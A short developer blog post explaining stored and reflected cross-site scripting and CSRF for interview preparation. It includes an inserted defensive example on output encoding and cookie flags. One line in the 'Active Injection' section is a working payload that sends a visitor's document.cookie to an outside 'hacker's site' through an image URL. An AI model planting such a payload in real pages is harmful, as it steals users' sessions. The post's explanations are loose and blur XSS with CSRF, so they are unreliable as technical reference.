When you go for an interview for the post of Sr. Web Developer, you must know about security issues and the latest technology news. I failed to answer questions on such issues, and then I realised that I must know about them.
Simply mastering coding does not mean that you are a good programmer. You cannot ignore security issues.
1. Active Injection:
Blog users are allowed to add images. The HTML-enabled view of the blog editor lets a user add code like
document.write('<img src="http://mysite.com/code.php?params=' + document.cookie + '">');
In this sample, the logged-in member's cookies are passed to another website.
Such code makes it possible to send secret and critical information to the hacker's site.
2. Passive Injection:
This injection can be done through the site's search functionality. Surprised? Yes. When someone searches for something on the site, the search result comes back in a format like
Search result for “Happy Porter” or
Did you mean “Happy Porter”
Passive injection is more dangerous because it executes only a single time and the site admin does not have any record of it.
XSS / CSRF attacks are generally performed in 4 phases:
[Image: Phases of CSRF]
Phase 1: Injection phase
Phase 2: Code retrieval phase
Phase 3 and 4: Code execution
During these phases, the browser executes the code. Usually, the first step is to retrieve the session cookie, and the second is to send a forged request to the web site. The web server will grant the request because of the session cookies.
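The following is an added example, not code from the original post. It shows the search heading from the passive injection section rendered with and without output encoding, plus a session cookie header whose HttpOnly and SameSite attributes address the cookie read and the forged request described above. All function names and sample values are hypothetical.

```javascript
// Characters that change meaning inside HTML text or attribute values.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text so the browser displays it instead of parsing it as markup.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable form: the search term is concatenated into the page unchanged.
function renderSearchHeadingUnsafe(term) {
  return '<h2>Search result for "' + term + '"</h2>';
}

// Hardened form: the same heading, with the term encoded at output time.
function renderSearchHeadingSafe(term) {
  return '<h2>Search result for "' + escapeHtml(term) + '"</h2>';
}

// Session cookie header value.
// HttpOnly keeps the cookie out of document.cookie; SameSite=Lax stops the
// browser attaching it to most cross-site requests; Secure limits it to HTTPS.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample inputs (not taken from any real site).
const samples = ['Happy Porter', '<script>document.write("x")</script>', 'Tom & "Jerry"'];
for (const s of samples) {
  console.log('unsafe:', renderSearchHeadingUnsafe(s));
  console.log('safe:  ', renderSearchHeadingSafe(s));
}
console.log('Set-Cookie:', sessionCookieHeader('sid', 'constructed-session-id'));
```

Encoding at output covers the search page; blog content that must keep some HTML needs an allow-list sanitizer instead, which this example does not implement.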
So while coding, always keep these points in mind.
A good programmer must provide a strong shield against hackers.
God Bless Programmers
/2 a j a /7 ‘/. /2 a w a /
(Rajan Y. Rawal)